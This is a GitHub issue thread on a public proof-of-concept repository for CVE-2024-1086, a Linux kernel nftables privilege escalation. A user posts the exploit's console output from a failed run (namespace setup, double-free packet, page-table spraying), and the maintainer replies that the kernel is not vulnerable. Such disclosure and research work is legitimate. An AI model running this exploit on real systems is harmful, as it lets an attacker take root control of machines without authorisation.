Notselwyn / CVE-2024-1086

Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.
https://pwning.tech/nftables
MIT License

Sorry, how to solve it? #14

llllIIIllll closed 4 months ago

llllIIIllll commented 5 months ago
@:~/CVE-2024-1086$ ./exploit 
[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...
[*] setting up UID namespace...
[*] configuring localhost in namespace...
[*] setting up nftables...
[+] running normal privesc
[*] waiting for the calm before the storm...
[*] sending double free buffer packet...
[*] spraying 16000 pte's...
[*] checking 16000 sprayed pte's for overlap...
[-] failed to detect overwritten pte: is more PTE spray needed? pmd: 00000000cafebabe
@:~/CVE-2024-1086$ uname -a
Linux poi 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

Notselwyn commented 4 months ago

Your system is not vulnerable. Please check the affected versions table in the blogpost before creating GH Issues. Thanks 🙌